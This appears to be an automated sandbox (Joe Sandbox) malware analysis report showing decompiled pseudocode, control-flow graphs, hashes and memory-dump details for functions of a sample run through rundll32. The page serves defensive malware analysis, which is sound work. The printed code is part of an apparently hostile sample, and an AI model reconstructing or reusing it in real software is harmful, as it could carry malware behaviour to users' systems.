                                                                                                                                                                                                                                    • Opcode ID: 828d894d323024611cad70c9e7ee56e2704804326e053fa6c634d224a8ec07d9
                                                                                                                                                                                                                                    • Instruction ID: 71f99a56aa1ede9d73deacf054556c695030a66ca1bd0d5f505558462accf24d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 828d894d323024611cad70c9e7ee56e2704804326e053fa6c634d224a8ec07d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87318D73A01508AFDF21DBE0EC85EEE7FACEBA4600F154065B901AB560E7749A05DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A7B5D, Relevance: .1, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 308 50a7b5d-50a7b84 309 50a7b8d-50a7b91 308->309 310 50a7c0b-50a7c11 309->310 311 50a7b93-50a7b96 309->311 312 50a7b98-50a7bb0 call 50a908b 311->312 313 50a7bb3-50a7bcd 311->313 312->313 317 50a7bf8-50a7bfa 313->317 318 50a7bcf-50a7be9 313->318 319 50a7bfc-50a7bfe 317->319 320 50a7c02-50a7c07 317->320 322 50a7beb-50a7bf0 318->322 323 50a7bf2-50a7bf4 318->323 319->320 320->310 322->317 323->317
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E050A7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t22;
				void* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t33;
				intOrPtr _t36;
				intOrPtr* _t39;
				void* _t46;

				_t22 =  *0x50ad27c; // 0x214a5a8
				_t2 = _t22 + 0x50ae0dc; // 0x71f8684
				_t3 = _t22 + 0x50ae0cc; // 0x4590f811
				_t39 = 0;
				_v12 = 0;
				_t24 =  *0x50ad15c(_t3, 0, 1, _t2,  &_v16); // executed
				_t46 = _t24;
				if(_t46 >= 0) {
					if(_a8 != 0) {
						_t36 =  *0x50ad27c; // 0x214a5a8
						_t8 = _t36 + 0x50ae3b8; // 0x5f005f
						E050A908B(_t8, _a8,  &_v12);
						_t39 = _v12;
					}
					_t26 = _v16;
					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
					if(_t46 >= 0) {
						_t46 =  *0x50ad158(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						_t33 = _v8;
						if(_t46 < 0) {
							 *((intOrPtr*)( *_t33 + 8))(_t33);
						} else {
							 *_a12 = _t33;
						}
					}
					if(_t39 != 0) {
						 *((intOrPtr*)( *_t39 + 8))(_t39);
					}
					_t28 = _v16;
					 *((intOrPtr*)( *_t28 + 8))(_t28);
				}
				return _t46;
			}














                                                                                                                                                                                                                                    0x050a7b6a
                                                                                                                                                                                                                                    0x050a7b6f
                                                                                                                                                                                                                                    0x050a7b7b
                                                                                                                                                                                                                                    0x050a7b81
                                                                                                                                                                                                                                    0x050a7b84
                                                                                                                                                                                                                                    0x050a7b87
                                                                                                                                                                                                                                    0x050a7b8d
                                                                                                                                                                                                                                    0x050a7b91
                                                                                                                                                                                                                                    0x050a7b96
                                                                                                                                                                                                                                    0x050a7b9c
                                                                                                                                                                                                                                    0x050a7ba4
                                                                                                                                                                                                                                    0x050a7bab
                                                                                                                                                                                                                                    0x050a7bb0
                                                                                                                                                                                                                                    0x050a7bb0
                                                                                                                                                                                                                                    0x050a7bb3
                                                                                                                                                                                                                                    0x050a7bc9
                                                                                                                                                                                                                                    0x050a7bcd
                                                                                                                                                                                                                                    0x050a7be2
                                                                                                                                                                                                                                    0x050a7be6
                                                                                                                                                                                                                                    0x050a7be9
                                                                                                                                                                                                                                    0x050a7bf5
                                                                                                                                                                                                                                    0x050a7beb
                                                                                                                                                                                                                                    0x050a7bee
                                                                                                                                                                                                                                    0x050a7bee
                                                                                                                                                                                                                                    0x050a7be9
                                                                                                                                                                                                                                    0x050a7bfa
                                                                                                                                                                                                                                    0x050a7bff
                                                                                                                                                                                                                                    0x050a7bff
                                                                                                                                                                                                                                    0x050a7c02
                                                                                                                                                                                                                                    0x050a7c08
                                                                                                                                                                                                                                    0x050a7c08
                                                                                                                                                                                                                                    0x050a7c11

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: f613f848160ab7dd3e6ba5db84db6ccd510fa5f39f5191588a37659c76003010
                                                                                                                                                                                                                                    • Instruction ID: f3e43adab79c1f8ce2e179bc7b3cb5d3398e726bb9d0e24f08d2a9bcac06c854
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f613f848160ab7dd3e6ba5db84db6ccd510fa5f39f5191588a37659c76003010
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C213AB6600218BFCB10DFE4DC89DCEBBBDEF89750B058465F906DB241DA319A41CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A83B7, Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 324 50a83b7-50a8406 326 50a8408-50a8419 324->326 327 50a8479-50a847e 324->327 329 50a841b-50a843b call 50a2049 326->329 330 50a8470 326->330 334 50a843d-50a8447 329->334 335 50a8466 329->335 330->327 337 50a844c-50a844e 334->337 336 50a846f 335->336 336->330 338 50a8460-50a8461 call 50a9039 337->338 339 50a8450-50a845f call 50a5544 337->339 338->335 339->338
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7f67f5a8bc8e3d8a726215b168acb453673c5280521dfb98b8c4c2c5f512cb01
                                                                                                                                                                                                                                    • Instruction ID: 3d8edf501f80712079c7b99118b553813110f04b7c75a0bf925a3caa7b28a776
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f67f5a8bc8e3d8a726215b168acb453673c5280521dfb98b8c4c2c5f512cb01
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2F2116B2A10218BFEB119FA5DC45EDEBFBDFF19740F108026F901A6110D7759A459BA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A924F, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 343 50a924f-50a926a 344 50a9309-50a9315 343->344 345 50a9270-50a9289 343->345 347 50a928b-50a92b6 345->347 348 50a9308 345->348 351 50a92b8-50a92c5 call 50a2049 347->351 352 50a92fe-50a9307 347->352 348->344 356 50a92fd 351->356 357 50a92c7-50a92d1 351->357 352->348 356->352 358 50a92d6-50a92d8 357->358 359 50a92da-50a92f4 358->359 360 50a92f7-50a92f8 call 50a9039 358->360 359->360 360->356
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: a139e509aa876f7f8782be556df060bd9f747080841b6c87d77417f88375575a
                                                                                                                                                                                                                                    • Instruction ID: 5750b8fc6104a91d18a2719f0ba5dd9a2e386cfa6df10d66c2eb4eadb2d9081e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a139e509aa876f7f8782be556df060bd9f747080841b6c87d77417f88375575a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D213976A00209FFEB109F94EC84EEEBBB9EB44304F004066F911A6190DB758A15EB60
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A1B2F, Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 364 50a1b2f-50a1b9c call 50ab0c2 call 50aad5a 371 50a1b9e-50a1bab 364->371 372 50a1be4-50a1bea 364->372 376 50a1bad-50a1bb0 371->376 377 50a1bb2-50a1bba 371->377 375 50a1bec-50a1bf1 372->375 378 50a1bdb-50a1be2 376->378 379 50a1bc1-50a1bc3 377->379 378->375 380 50a1bd3-50a1bd9 379->380 381 50a1bc5-50a1bd1 379->381 380->375 380->378 381->375
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 1eb9e4a3a95ca845e8f85a06051969275de353ed21cddffee9a8f309d0d9da53
                                                                                                                                                                                                                                    • Instruction ID: 19c441ec290fd2cc5aca995d7eadddd46e5797cf33cfb6636ab88ca4aac222d2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1eb9e4a3a95ca845e8f85a06051969275de353ed21cddffee9a8f309d0d9da53
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5121C077654608BBD721EBE4EC0AFCE7BA9BB88750F114161F606EB2D0EB709901CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A3D0D, Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 384 50a3d0d-50a3d3b call 50a83b7 387 50a3d59-50a3d61 384->387 388 50a3d3d-50a3d41 384->388 390 50a3d89-50a3d8d call 50a924f 387->390 391 50a3d63-50a3d73 call 50a7923 387->391 388->387 389 50a3d43-50a3d4e 388->389 389->387 392 50a3d50-50a3d57 389->392 396 50a3d92-50a3d94 390->396 391->390 397 50a3d75-50a3d77 391->397 392->387 392->392 398 50a3da2-50a3da8 396->398 399 50a3d96-50a3d9d 396->399 400 50a3d79-50a3d87 397->400 401 50a3d9f-50a3da1 397->401 399->398 399->401 400->398 401->398
                                                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                                                    			E050A3D0D(intOrPtr* _a4, void* _a8) {
				void _v31;
				char _v32;
				void* _t17;
				void* _t19;
				intOrPtr _t21;
				void* _t23;
				signed int _t25;
				signed int _t26;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t40;

				_t25 = 6;
				_v32 = 0;
				memset( &_v31, 0, _t25 << 2);
				_t26 = 0;
				asm("stosw");
				asm("stosb");
				_t31 = 0; // executed
				_t17 = E050A83B7( *0x50ad258,  &_v32); // executed
				if(_t17 != 0 && _v31 > 2) {
					_t23 = (_v31 & 0x000000ff) + 0xfffffffe;
					_t26 = 0;
					if(_t23 > 0) {
						do {
							_t31 = _t31 +  *((intOrPtr*)(_t32 + _t26 * 4 - 0x10));
							_t26 = _t26 + 1;
						} while (_t26 < _t23);
					}
				}
				_t39 = _t31;
				 *0x50ad270 = _t31;
				if(_t31 != 0) {
					L8:
					_t19 = E050A924F( &_a8); // executed
					__eflags = _t19;
					if(_t19 == 0) {
						__eflags = _a8 - 0x1000;
						if(_a8 == 0x1000) {
							goto L10;
						}
					}
				} else {
					_t21 = E050A7923(_t26, _t39);
					_t40 =  *0x50ad270; // 0xd448b889
					 *_a8 = _t21;
					if(_t40 != 0) {
						goto L8;
					} else {
						if(_t21 == 0) {
							L10:
							_push(5);
							_pop(0);
						} else {
							 *_a4 = 1;
							 *0x50ad270 = _t21;
						}
					}
				}
				return 0;
			}














                                                                                                                                                                                                                                    0x050a3d18
                                                                                                                                                                                                                                    0x050a3d1d
                                                                                                                                                                                                                                    0x050a3d23
                                                                                                                                                                                                                                    0x050a3d23
                                                                                                                                                                                                                                    0x050a3d25
                                                                                                                                                                                                                                    0x050a3d27
                                                                                                                                                                                                                                    0x050a3d32
                                                                                                                                                                                                                                    0x050a3d34
                                                                                                                                                                                                                                    0x050a3d3b
                                                                                                                                                                                                                                    0x050a3d47
                                                                                                                                                                                                                                    0x050a3d4a
                                                                                                                                                                                                                                    0x050a3d4e
                                                                                                                                                                                                                                    0x050a3d50
                                                                                                                                                                                                                                    0x050a3d50
                                                                                                                                                                                                                                    0x050a3d54
                                                                                                                                                                                                                                    0x050a3d55
                                                                                                                                                                                                                                    0x050a3d50
                                                                                                                                                                                                                                    0x050a3d4e
                                                                                                                                                                                                                                    0x050a3d59
                                                                                                                                                                                                                                    0x050a3d5b
                                                                                                                                                                                                                                    0x050a3d61
                                                                                                                                                                                                                                    0x050a3d89
                                                                                                                                                                                                                                    0x050a3d8d
                                                                                                                                                                                                                                    0x050a3d92
                                                                                                                                                                                                                                    0x050a3d94
                                                                                                                                                                                                                                    0x050a3d96
                                                                                                                                                                                                                                    0x050a3d9d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3d9d
                                                                                                                                                                                                                                    0x050a3d63
                                                                                                                                                                                                                                    0x050a3d63
                                                                                                                                                                                                                                    0x050a3d68
                                                                                                                                                                                                                                    0x050a3d71
                                                                                                                                                                                                                                    0x050a3d73
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3d75
                                                                                                                                                                                                                                    0x050a3d77
                                                                                                                                                                                                                                    0x050a3d9f
                                                                                                                                                                                                                                    0x050a3d9f
                                                                                                                                                                                                                                    0x050a3da1
                                                                                                                                                                                                                                    0x050a3d79
                                                                                                                                                                                                                                    0x050a3d7c
                                                                                                                                                                                                                                    0x050a3d82
                                                                                                                                                                                                                                    0x050a3d82
                                                                                                                                                                                                                                    0x050a3d77
                                                                                                                                                                                                                                    0x050a3d73
                                                                                                                                                                                                                                    0x050a3da8

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 5f87e4f241edbca79fbfcd141d69bce337d4ec787602f90ba09fc3272257f021
                                                                                                                                                                                                                                    • Instruction ID: ed2c4d827c3eb3236bb6bb50cd399d7efaa3e850985a05cc3586d16c2364d73f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f87e4f241edbca79fbfcd141d69bce337d4ec787602f90ba09fc3272257f021
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F011E373A00684AEDF609EF9FC44AFE7BE9BB54354F00493AE811D6180E774C186CB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A94A9, Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 402 50a94a9-50a94bc 403 50a94c3-50a94c7 402->403 405 50a94c9-50a94da call 50a2049 403->405 406 50a94be-50a94c2 403->406 409 50a951f 405->409 410 50a94dc-50a94e1 405->410 406->403 411 50a9521-50a9528 409->411 412 50a94e8 410->412 413 50a94ea-50a94f3 412->413 415 50a9505-50a9511 413->415 416 50a94f5-50a94fe 413->416 415->413 417 50a9513-50a951d 415->417 416->415 417->411
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7515a5d1eab51dc18dc49c83d8f2210e00b4f16d5ac5ba71dfae17b51fda671b
                                                                                                                                                                                                                                    • Instruction ID: e74f996b6306c421f1aea9f04871b953122f38bfe44236102a256ca0899112de
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7515a5d1eab51dc18dc49c83d8f2210e00b4f16d5ac5ba71dfae17b51fda671b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6B0152737053256FD2219EA9AC4AF3F7FD8FB85690F160919F945C7240DA64C80286A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050A21CD, Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 418 50a21cd-50a21e0 call 50a84d5 420 50a21e5-50a21f3 call 50a12d4 418->420 423 50a2222 420->423 424 50a21f5-50a2202 call 50a809f 420->424 426 50a2224-50a222d call 50a84d5 423->426 429 50a2211-50a2216 424->429 430 50a2204-50a220d 424->430 433 50a222f-50a223c 426->433 434 50a2252-50a2258 426->434 429->423 430->420 432 50a220f 430->432 432->426 435 50a223e-50a2242 433->435 436 50a224c 433->436 435->436 437 50a2244-50a224a 435->437 438 50a224f 436->438 437->438 438->434
                                                                                                                                                                                                                                    C-Code - Quality: 32%
                                                                                                                                                                                                                                    			E050A21CD(void* __ecx, signed char* _a4) {
				char _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				signed short* _t21;
				void* _t23;
				intOrPtr* _t26;

				_t23 = 0;
				_push(0);
				_t18 = 1;
				_t26 = 0x50ad330;
				E050A84D5();
				while(1) {
					_t8 = E050A12D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E050A809F(_t14);
					if(_t15 == 0) {
						__imp__( *0x50ad238, 0, _v8);
						break;
					} else {
						 *_t26 = _t15;
						_t26 = _t26 + 4;
						_t23 = _t23 + 1;
						if(_t23 < 3) {
							continue;
						} else {
						}
					}
					L7:
					_push(1);
					E050A84D5();
					if(_t18 != 0) {
						_t21 =  *0x50ad338; // 0x71f9b70
						_t11 =  *_t21 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;
						}
						 *_t21 = _t12;
					}
					return _t18;
				}
				_t18 = 0;
				goto L7;
			}













                                                                                                                                                                                                                                    0x050a21d5
                                                                                                                                                                                                                                    0x050a21d9
                                                                                                                                                                                                                                    0x050a21da
                                                                                                                                                                                                                                    0x050a21db
                                                                                                                                                                                                                                    0x050a21e0
                                                                                                                                                                                                                                    0x050a21e5
                                                                                                                                                                                                                                    0x050a21ec
                                                                                                                                                                                                                                    0x050a21f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a21f5
                                                                                                                                                                                                                                    0x050a21fa
                                                                                                                                                                                                                                    0x050a21fb
                                                                                                                                                                                                                                    0x050a2202
                                                                                                                                                                                                                                    0x050a221c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a2204
                                                                                                                                                                                                                                    0x050a2204
                                                                                                                                                                                                                                    0x050a2206
                                                                                                                                                                                                                                    0x050a2209
                                                                                                                                                                                                                                    0x050a220d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a220f
                                                                                                                                                                                                                                    0x050a220d
                                                                                                                                                                                                                                    0x050a2224
                                                                                                                                                                                                                                    0x050a2224
                                                                                                                                                                                                                                    0x050a2226
                                                                                                                                                                                                                                    0x050a222d
                                                                                                                                                                                                                                    0x050a222f
                                                                                                                                                                                                                                    0x050a2235
                                                                                                                                                                                                                                    0x050a223c
                                                                                                                                                                                                                                    0x050a224c
                                                                                                                                                                                                                                    0x050a2244
                                                                                                                                                                                                                                    0x050a2247
                                                                                                                                                                                                                                    0x050a2247
                                                                                                                                                                                                                                    0x050a224f
                                                                                                                                                                                                                                    0x050a224f
                                                                                                                                                                                                                                    0x050a2258
                                                                                                                                                                                                                                    0x050a2258
                                                                                                                                                                                                                                    0x050a2222
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 99970c5f1fbe3e073cad7b0e2366dae6de526f8ca5b0da63883ad7cb9f79ac9c
                                                                                                                                                                                                                                    • Instruction ID: c942f08ec48e117d6646026f225a081921aae7902f040830d95155ed128eff96
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99970c5f1fbe3e073cad7b0e2366dae6de526f8ca5b0da63883ad7cb9f79ac9c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F301F53B304206BAE710AEE6FC84FBE76A9EB95264F400035BD45C6050E6699C429720
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 050AA72D, Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 439 50aa72d-50aa73d call 50a2049 442 50aa73f-50aa74f call 50a7b5d 439->442 443 50aa7a1-50aa7a3 439->443 446 50aa754-50aa758 442->446 444 50aa7a4-50aa7a7 443->444 447 50aa75a-50aa77d 446->447 448 50aa797-50aa79f call 50a9039 446->448 452 50aa788-50aa790 447->452 453 50aa77f-50aa786 447->453 448->444 454 50aa793-50aa795 452->454 453->454 454->444 454->448
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E050AA72D(intOrPtr _a4, intOrPtr* _a8) {
				void* _t9;
				void* _t11;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr* _t17;
				intOrPtr* _t19;
				intOrPtr _t25;
				intOrPtr _t27;
				intOrPtr* _t28;

				_t28 = E050A2049(_t9, 8);
				if(_t28 == 0) {
					_t11 = 8;
					return _t11;
				}
				_t12 =  *0x50ad27c; // 0x214a5a8
				_t2 = _t12 + 0x50ae1bc; // 0x6f0072
				_t14 = E050A7B5D(_t2, _a4, _t28); // executed
				_t27 = _t14;
				if(_t27 < 0) {
					L6:
					E050A9039(_t14, _t28);
					return _t27;
				}
				_t17 =  *_t28;
				_t3 = _t28 + 4; // 0x4
				_t25 =  *0x50ad27c; // 0x214a5a8
				_t4 = _t25 + 0x50ae1fc; // 0x740053
				_t27 =  *((intOrPtr*)( *_t17 + 0x18))(_t17, _t4, 0, 0, _t3, 0);
				if(_t27 < 0) {
					_t19 =  *_t28;
					 *((intOrPtr*)( *_t19 + 8))(_t19);
					_t14 = _a4;
				} else {
					_t14 = 0;
					 *_a8 = _t28;
				}
				if(_t27 < 0) {
					goto L6;
				}
				return _t14;
			}












                                                                                                                                                                                                                                    0x050aa739
                                                                                                                                                                                                                                    0x050aa73d
                                                                                                                                                                                                                                    0x050aa7a3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050aa7a3
                                                                                                                                                                                                                                    0x050aa73f
                                                                                                                                                                                                                                    0x050aa748
